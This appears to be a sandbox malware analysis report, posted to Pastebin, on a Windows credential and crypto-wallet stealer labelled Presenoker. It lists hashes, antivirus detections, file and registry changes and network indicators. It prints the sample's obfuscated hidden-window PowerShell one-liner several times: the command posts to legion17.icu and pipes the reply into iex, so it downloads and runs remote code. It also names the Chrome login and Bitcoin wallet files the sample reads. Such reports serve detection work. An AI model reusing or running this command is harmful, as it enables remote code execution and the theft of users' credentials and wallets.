paladin316

Exes_960ae6913fcf48a111d0c6e3a9ef9432_2_2019-08-02_22_30.txt

Aug 2nd, 2019
2,870
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.21 KB | None | 0 0
  1.  
  2. * MalFamily: "Presenoker"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_960ae6913fcf48a111d0c6e3a9ef9432.2"
  7. * File Size: 16384
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "1223da902b1525073ad6a4a71214b1c1b062fa61ce23138dcea4e7c7bfe9b8ab"
  10. * MD5: "960ae6913fcf48a111d0c6e3a9ef9432"
  11. * SHA1: "56ee94177e2dd2b49356b160629514a9949a8678"
  12. * SHA512: "23e5356e51ddc069bdc54b610df044a7657ba27d91d439644e12be1976dd1bd39c4018bed95f7a6d45fa5062af96dc08b8c821bad17317c4061eb4e714b220ab"
  13. * CRC32: "9BFEA3FF"
  14. * SSDEEP: "384:Faqgrju/qjJVXNkG/43/z7ghh3AC24Mda3InYs:BgRjzXNkY3At6IYs"
  15.  
  16. * Process Execution:
  17. "Exes_960ae6913fcf48a111d0c6e3a9ef9432.2",
  18. "cmd.exe",
  19. "powershell.exe"
  20.  
  21.  
  22. * Executed Commands:
  23. "cmd.exe /c start /B powershell -windowstyle hidden -command \"&$t='#i#ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legion17.icu/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\"",
  24. "powershell -windowstyle hidden -command \"&$t='#i#ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legion17.icu/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\""
  25.  
  26.  
  27. * Signatures Detected:
  28.  
  29. "Description": "Creates RWX memory",
  30. "Details":
  31.  
  32.  
  33. "Description": "A process created a hidden window",
  34. "Details":
  35.  
  36. "Process": "Exes_960ae6913fcf48a111d0c6e3a9ef9432.2 -> cmd.exe /c start /B powershell -windowstyle hidden -command \"&$t='#i#ex#@(n#ew#-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).#Up#loa#d#St#ri#ng(#''h#t#tp#:#//legion17.icu/leg#ion1#7#/#w#el#co#me''#,#''H#or#seHo#urs''#)#|#i#e#x'.replace('#','').split('@',5);&$t0$t1\""
  37.  
  38.  
  39. "Process": "cmd.exe -> C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
  40.  
  41.  
  42.  
  43.  
  44. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  45. "Details":
  46.  
  47. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  48.  
  49.  
  50. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  51.  
  52.  
  53. "suspicious_request": "http://legion17.icu/legion17/welcome"
  54.  
  55.  
  56.  
  57.  
  58. "Description": "Performs some HTTP requests",
  59. "Details":
  60.  
  61. "url": "http://legion17.icu/legion17/welcome"
  62.  
  63.  
  64.  
  65.  
  66. "Description": "Steals private information from local Internet browsers",
  67. "Details":
  68.  
  69. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  75. "Details":
  76.  
  77. "McAfee": "Artemis!960AE6913FCF"
  78.  
  79.  
  80. "Cylance": "Unsafe"
  81.  
  82.  
  83. "Symantec": "Trojan.Gen.2"
  84.  
  85.  
  86. "Kaspersky": "Trojan-Spy.Win32.Stealer.nvm"
  87.  
  88.  
  89. "Paloalto": "generic.ml"
  90.  
  91.  
  92. "AegisLab": "Trojan.Multi.Generic.4!c"
  93.  
  94.  
  95. "Tencent": "Win32.Trojan-downloader.Agent.Hqva"
  96.  
  97.  
  98. "McAfee-GW-Edition": "Artemis!Trojan"
  99.  
  100.  
  101. "Microsoft": "PUA:Win32/Presenoker"
  102.  
  103.  
  104. "ZoneAlarm": "Trojan-Spy.Win32.Stealer.nvm"
  105.  
  106.  
  107. "MAX": "malware (ai score=83)"
  108.  
  109.  
  110. "Malwarebytes": "Trojan.Downloader"
  111.  
  112.  
  113. "ESET-NOD32": "Win32/TrojanDownloader.Agent.EQX"
  114.  
  115.  
  116. "AVG": "FileRepMalware"
  117.  
  118.  
  119. "Qihoo-360": "Win32/Trojan.Spy.03e"
  120.  
  121.  
  122.  
  123.  
  124. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  125. "Details":
  126.  
  127. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\wallet.dat"
  128.  
  129.  
  130. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\wallets\\wallet.dat"
  131.  
  132.  
  133. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
  134.  
  135.  
  136.  
  137.  
  138.  
  139. * Started Service:
  140.  
  141. * Mutexes:
  142. "Global\\CLR_CASOFF_MUTEX",
  143. "Global\\.net clr networking"
  144.  
  145.  
  146. * Modified Files:
  147. "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  148. "\\??\\PIPE\\srvsvc",
  149. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\AL6BPPXSKRQT27HN572K.temp",
  150. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms"
  151.  
  152.  
  153. * Deleted Files:
  154. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\AL6BPPXSKRQT27HN572K.temp",
  155. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2264.10432828",
  156. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2264.10432843",
  157. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2264.10432843"
  158.  
  159.  
  160. * Modified Registry Keys:
  161. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  162. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powershell_RASAPI32",
  163. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableFileTracing",
  164. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableConsoleTracing",
  165. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileTracingMask",
  166. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\ConsoleTracingMask",
  167. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\MaxFileSize",
  168. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileDirectory"
  169.  
  170.  
  171. * Deleted Registry Keys:
  172.  
  173. * DNS Communications:
  174.  
  175. "type": "A",
  176. "request": "legion17.icu",
  177. "answers":
  178.  
  179. "data": "8.209.82.226",
  180. "type": "A"
  181.  
  182.  
  183.  
  184.  
  185.  
  186. * Domains:
  187.  
  188. "ip": "8.209.82.226",
  189. "domain": "legion17.icu"
  190.  
  191.  
  192.  
  193. * Network Communication - ICMP:
  194.  
  195. * Network Communication - HTTP:
  196.  
  197. "count": 1,
  198. "body": "",
  199. "uri": "http://legion17.icu/legion17/welcome",
  200. "user-agent": "",
  201. "method": "POST",
  202. "host": "legion17.icu",
  203. "version": "1.1",
  204. "path": "/legion17/welcome",
  205. "data": "POST /legion17/welcome HTTP/1.1\r\nHost: legion17.icu\r\nContent-Length: 10\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n\r\n",
  206. "port": 80
  207.  
  208.  
  209.  
  210. * Network Communication - SMTP:
  211.  
  212. * Network Communication - Hosts:
  213.  
  214. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment